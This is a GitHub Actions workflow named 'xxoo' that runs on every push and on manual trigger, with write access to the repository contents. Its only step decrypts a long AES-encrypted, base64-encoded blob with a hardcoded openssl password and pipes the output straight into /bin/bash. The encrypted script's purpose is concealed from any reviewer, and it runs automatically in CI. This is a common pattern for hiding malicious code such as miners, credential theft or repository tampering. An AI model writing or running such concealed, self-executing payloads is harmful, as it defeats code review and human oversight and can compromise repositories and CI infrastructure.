name: xxoo
on:
  workflow_dispatch:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
      - name: xxoo
        run: |
          echo "U2FsdGVkX19pslqDn7p2yKVF0cP0NeacgqYED1vO4+zDnqzCGOED9Z6RmKJnwFuVJ0RTNoRB2DWRPQWicIWWNiwTsa7F0+8Ku5LWRVe9xrueURDSuXNyt0PhNFj6DMdXa6qhSot0gvza7MojR90R//FAT0j97UYMfZM3S39lSEaxRbePq5zTC16khQEHFyTEA86ob4DlA1HPtUvbII8wlU5yRy3NKSI05T4RgyvivF4enka9Gnh+FYjuRNlKIQGL71l8hKJI2lHJwBBDqkDKEgRozzlFGHzvhXMDsJ2SYs7W2MeDKwigR3dU6Fx4nfKEIVRUWLU0oAg+Js1vwjTXmAeCps0/WeCSjHdBTKf7oiFWAeNgX7j53SC6cXelYOMAJHhPaiLkKfOJuN+CCRe7e+BLzWjfPVjdMtokVBkMje84mstR0KE61YB90rQhfHPdE2ABH+1SCdwD8NYW269Arf8erw9PLJDEeGqJVXi4wINkWkUP90eRd+GRiSDoFNwp4Jqp73X9hdVQO7zQmEg7UEh4ONZI2uP2uqQkbG9KwqenxtGkYvRcvZ+sy6oJTZQz7CLNdiy+RAMZk8kU8tzi2ERgjd5CmNF8KfCpoN762h96KGOCMF9evRpRs+134OZp5b2+qgV71GNL2D6Pa0XzbKxnHoNbvMe/Zp6tzmDNmBAt+kk+JcXawRogyMEn4Vvcb/L2hqX2o/A1DMOazj5z9OWyLM+SwqCuDplfNRbyZs7G243vPoKvLr8bOZqNioYNyVHdexqr3EU8F2ouRwcghY3WequWb4OsHsV+/XmNC1JUetH1/om8+kouJcxLBdUFZdpxQDsBwRK4NA5wqOxuDVdtueECp5J/1klui+mW6U5cQBfIg3gtIG5OMc0HgftNITw845AexhJ5FkE16L8TujjqGtCMRE5w9hoYuGGItIDu/TemWuVSDWw01x+8+upGI+HMc0DqeUDCmq8xXUk+ImcpwoPQUyvFwvKwW/ATVQ1Wlt2b2tNJqreRPC5CP/NfUZyyxSL6dUwxnx8S+VTKvfA9eobm6Ne9NGma7cAwuXliDY2tPO12yyHBL+4OC1YK65onQKOzWmsOf/MygUZPhlJFgFMpAlln5LmCZX1y5ENwG8NaU9wJs0b3Zz1ehRT/lZbwicmQKThRhiqRB3d57JEfxOvIw/sTvgSoVM0t90jvQcCumfH5pdeVuFysjBgKRT27pa5VqDhi151dIrnOm+xh994Vl8zFaSZdMIIJ7VIg1F7x8vrA9+wiVCZDUq3aMliTie031Ko1+mMdKpIiuzYKunP44Np29GqrM74rCLu4XX+8Ch17R9tWmYx20o4nfgE918fVVgQGGdFb8MD5KA==" | openssl enc -d -aes-256-cbc -base64 -A -salt -pbkdf2 -pass pass:7uhfudnfud909~~23 | /bin/bash

